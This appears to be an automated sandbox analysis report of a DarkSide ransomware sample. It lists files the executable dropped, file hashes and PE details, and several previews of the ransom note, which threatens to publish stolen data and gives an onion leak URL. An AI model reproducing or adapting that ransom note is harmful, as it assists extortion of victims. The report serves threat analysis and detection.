                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\Desktop\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\Documents\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):5340
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:LwmxqbMcpdlO/LFz88QMs88XmxqbMcpdlO/LFz88QMs88W:8m0wcpdlOjFz2rbXm0wcpdlOjFz2rbW
                                                                                      MD5:8B4B7351CE1BEC0085228C2BDA959D4E
                                                                                      SHA1:7E38648E50AEBD99EB786C1EC68242DB775536DB
                                                                                      SHA-256:F907D383D6FC3D3C139BBDB97AA34167D2FA185008F402035D4AF20672AA0819
                                                                                      SHA-512:FE3F944F4A9760DB7E9D0B6C9D56A7CAF6AA691D2749DDD081A71255114BAA584BBE5F2AA7B096CAA3542E61491F38EA7B8DC42D393624EF323E977716261297
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\Downloads\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\Favorites\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\Links\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\Music\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8010
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:8m0wcpdlOjFz2rbXm0wcpdlOjFz2rbXm0wcpdlOjFz2rbW:8mVcpM2rDmVcpM2rDmVcpM2r6
                                                                                      MD5:EF2EF1311ED9C8D68B9A8D3DDA11B484
                                                                                      SHA1:C84F5DBCCBE395002D7A1AD472B19A856DF3279B
                                                                                      SHA-256:20D546674D92FA53CF8C5BB978D7800385B892158A8BD5B16837285051A31759
                                                                                      SHA-512:0C429D01BAC389ADD6C155AE53BC8F3307F04AAC695B22AB1EFC77A970EE96382C14D67916CECCBFAF3BFE7C1A0CC9FF708348A1D2471FE3161F5F2FE4E34405
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\Pictures\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8010
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:8m0wcpdlOjFz2rbXm0wcpdlOjFz2rbXm0wcpdlOjFz2rbW:8mVcpM2rDmVcpM2rDmVcpM2r6
                                                                                      MD5:EF2EF1311ED9C8D68B9A8D3DDA11B484
                                                                                      SHA1:C84F5DBCCBE395002D7A1AD472B19A856DF3279B
                                                                                      SHA-256:20D546674D92FA53CF8C5BB978D7800385B892158A8BD5B16837285051A31759
                                                                                      SHA-512:0C429D01BAC389ADD6C155AE53BC8F3307F04AAC695B22AB1EFC77A970EE96382C14D67916CECCBFAF3BFE7C1A0CC9FF708348A1D2471FE3161F5F2FE4E34405
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\Saved Games\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\Videos\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):8010
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:8m0wcpdlOjFz2rbXm0wcpdlOjFz2rbXm0wcpdlOjFz2rbW:8mVcpM2rDmVcpM2rDmVcpM2r6
                                                                                      MD5:EF2EF1311ED9C8D68B9A8D3DDA11B484
                                                                                      SHA1:C84F5DBCCBE395002D7A1AD472B19A856DF3279B
                                                                                      SHA-256:20D546674D92FA53CF8C5BB978D7800385B892158A8BD5B16837285051A31759
                                                                                      SHA-512:0C429D01BAC389ADD6C155AE53BC8F3307F04AAC695B22AB1EFC77A970EE96382C14D67916CECCBFAF3BFE7C1A0CC9FF708348A1D2471FE3161F5F2FE4E34405
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):0.1112291448563076
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:dGTnVXm/Ey6q99950F3ekXg1Q10nMCldimE8eawHjcDV:M4l68m0cyMCldzE9BHjcJ
                                                                                      MD5:341E092D7964B551BD2D177177378025
                                                                                      SHA1:7420DF32C28DD7DC2D287B91141CC06903982149
                                                                                      SHA-256:322FA1CC037E0272308011407F8DDEEED1529BE7BF21E867F3B91A7AF78BEE51
                                                                                      SHA-512:64F826E07D9F7F892B59A4965F19C968DB1E8B068B7A3E6D9FFAB3E8C44582D33F4A4BA6036F83F674D51C30763ED0478351F28CFA2639AF32665E23D8452DE0
                                                                                      Malicious:false
                                                                                      Preview: ................................................................................@... ....q#......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................?`....... .......h.1G..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.@... .....#.............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):0.11367434056994173
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:OCXVXm/Ey6q99950g1miUkXg1Q10nMCldimE8eawHza1miIfXnF:OCX4l68mg1tUcyMCldzE9BHza1tIf3F
                                                                                      MD5:E99DA09E3D3E1827D56044DF442BA946
                                                                                      SHA1:D97FC8964E44A7F17BCE19FAAA38F8B5B201EDC4
                                                                                      SHA-256:664DDC56CDBF4CE847887E9B088395202229EF26F8B341001827B374825C1879
                                                                                      SHA-512:932B69466710F5A0F25043176EE8F1E4E03568C0F1D9350C1984CF0FF8CE4563EB88D97991ABDAF8B98FC6120CA84ABB5FC80BF11729CE49EE48F992CBD235CC
                                                                                      Malicious:false
                                                                                      Preview: ............................................................................ ...@... .....!......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................?`....... .......a.1G..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.@... .....!.............................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):0.11360251702902835
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:OCVXm/Ey6q99950F1mK21kXg1Q10nMCldimE8eawHza1mKOF:OC4l68mF1i1cyMCldzE9BHza1M
                                                                                      MD5:B0D195F5FF730ACCC420FC3BB3818917
                                                                                      SHA1:818BE027C3B361EEE53BC25E1F82C7B093865B58
                                                                                      SHA-256:88BEA8F9A9229B2BBC6C220AEAD479215BC1D149DABEB63DCA6D93C0970522CA
                                                                                      SHA-512:F11A693034185B10666208B8300146151866B4F8736B0592267BBC469A12547295A9BADE55C1026A208C65F46D14C748D1AEA7FD4929B185874DCA5643713031
                                                                                      Malicious:false
                                                                                      Preview: ............................................................................ ...@... ....4.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................?`....... ......_S.1G..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.@... ...TA..............................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):55
                                                                                      Entropy (8bit):4.306461250274409
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                      Malicious:false
                                                                                      Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):906
                                                                                      Entropy (8bit):3.1465789865752596
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:58KRBubdpkoF1AG3rls8PZk9+MlWlLehB4yAq7ejCEs8vI:OaqdmuF3rlX++kWReH4yJ7MN3I
                                                                                      MD5:83B76B88FB5AD77FC1A88D7CC777B7F1
                                                                                      SHA1:263FDED0E0A79B31EF917CB34A26CBE099E2D1D1
                                                                                      SHA-256:531F2D7E42E90E4D05C44463EAFBCC9602EA563B66BDC3881E69E17B222EDFB2
                                                                                      SHA-512:8B42875798BD84D51B95033BBB118FBA8CD35AE6B7FCAAE0A3803A6F72AF3D3F0EE1ACD5FA53F24685B7C3E0DD622F006CB2F40E66E7D6BBE4B751020A906F68
                                                                                      Malicious:false
                                                                                      Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. M.a.y. .. 1.2. .. 2.0.2.1. .0.6.:.1.7.:.5.5.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. W.e.d. .. M.a.y. .. 1.2. .. 2.0.2.1. .0.6.:.1.7.:.5.5.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.884829006908391
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:P3FwQWmwUM.exe
                                                                                      File size:61784
                                                                                      MD5:c4da0137cbb99626fd44da707ae1bca8
                                                                                      SHA1:a38e9891152755d9e7fff7386bb5a1bca375bd91
                                                                                      SHA256:1d4c0b32aea68056755daf70689699200ffa09688495ccd65a0907cade18bd2a
                                                                                      SHA512:dd8212ff73522c6590ff8d8a3a48276fd872649eada2315b045c8c9f6cf054c3fe6cd741a16744eb82eff763acb745f07336c44db8f0c693770180cf7fd90645
                                                                                      SSDEEP:1536:mWIrgG/4CMjuhy03Z63tFjr5EOkpIsT6oKw8ebioQ+9o:ZG/4CJhxIdJr5sDBKw7jo
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G.,`.....................>....................@.................................>......................................

                                                                                      File Icon

